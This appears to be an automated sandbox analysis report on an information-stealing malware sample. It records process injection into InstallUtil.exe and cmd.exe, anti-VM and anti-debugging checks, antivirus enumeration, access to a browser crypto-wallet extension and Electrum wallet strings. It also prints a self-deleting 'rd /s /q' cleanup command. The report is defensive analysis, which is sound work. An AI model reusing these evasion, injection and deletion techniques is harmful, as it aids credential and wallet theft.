                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                        Source: InstallUtil.exe, 00000004.00000002.2454873624.000000000129B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                        Source: cmd.exe, 0000000C.00000002.2908281971.0000000002C96000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWp
                        Source: cmd.exe, 0000000C.00000002.2908281971.0000000002CCD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWS
                        Source: InstallUtil.exe, 00000004.00000002.2454873624.00000000011D7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2908281971.0000000002CCD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                        Source: InstallUtil.exe, 00000004.00000002.2454873624.0000000001170000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
                        Source: InstallUtil.exe, 00000004.00000002.2454873624.0000000001170000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe API call chain: ExitProcess graph end node graph_4-90973
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe API call chain: ExitProcess graph end node graph_4-90957
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeAPI call chain: ExitProcess graph end nodegraph_4-92288
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0041D016 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0041D016
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00418950 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_00418950
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_004014AD mov eax, dword ptr fs:[00000030h]4_2_004014AD
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0040148A mov eax, dword ptr fs:[00000030h]4_2_0040148A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_004014A2 mov eax, dword ptr fs:[00000030h]4_2_004014A2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00418599 mov eax, dword ptr fs:[00000030h]4_2_00418599
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0041859A mov eax, dword ptr fs:[00000030h]4_2_0041859A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0040884C CopyFileA,GetProcessHeap,RtlAllocateHeap,StrCmpCA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrlenA,lstrlenA,DeleteFileA,4_2_0040884C
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0041D016 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0041D016
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0041D98C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_0041D98C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0042762E SetUnhandledExceptionFilter,4_2_0042762E
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C66B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_6C66B66C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C66B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_6C66B1F7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C81AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_6C81AC62
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        Source: Yara matchFile source: Process Memory Space: 7AeSqNv1rC.exe PID: 7300, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7648, type: MEMORYSTR
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and writeJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: C:\Windows\SysWOW64\cmd.exe base: 400000 protect: page execute and read and writeJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0040F54A _memset,CreateProcessA,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,VirtualAllocEx,ResumeThread,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,4_2_0040F54A
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 400000 value starts with: 4D5AJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_004124A8 __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,4_2_004124A8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0041257F __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,4_2_0041257F
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 401000Jump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 430000Jump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43D000Jump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 670000Jump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 671000Jump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: CB8008Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 400000Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 401000Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 45C000Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 47B000Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 47E000Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 47F000Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 2B1B008Jump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe"Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\GIEHIDHJDBFI" & exitJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0040111D cpuid 4_2_0040111D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,4_2_00410DDB
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_0042B0CC
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,4_2_0042B1C1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,4_2_00429A50
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,4_2_0042B268
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,4_2_0042B2C3
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,4_2_0042AB40
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,4_2_004253E3
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,4_2_0042B494
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,4_2_0042749C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: EnumSystemLocalesA,4_2_0042B556
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,4_2_00429D6E
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,4_2_0042E56F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,4_2_00427576
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,4_2_00428DC4
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,4_2_0042B5E7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,4_2_0042B580
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,4_2_0042B623
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: GetLocaleInfoA,4_2_0042E6A4
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Users\user\Desktop\7AeSqNv1rC.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\ VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0041C0E9 lstrcpyA,GetLocalTime,SystemTimeToFileTime,4_2_0041C0E9
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_00410C53 GetProcessHeap,HeapAlloc,GetUserNameA,4_2_00410C53
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_00410D2E GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,4_2_00410D2E
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                        Source: InstallUtil.exe, 00000004.00000002.2454873624.0000000001170000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                        Stealing of Sensitive Information

                        Source: Yara match, File source: Process Memory Space: cmd.exe PID: 2472, type: MEMORYSTR
                        Source: Yara match, File source: sslproxydump.pcap, type: PCAP
                        Source: Yara match, File source: 4.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 4.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: 00000000.00000002.1905965220.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: Process Memory Space: 7AeSqNv1rC.exe PID: 7300, type: MEMORYSTR
                        Source: Yara match, File source: Process Memory Space: InstallUtil.exe PID: 7648, type: MEMORYSTR
                        Source: InstallUtil.exe, 00000004.00000002.2454730530.0000000000F51000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: *electrum*.*
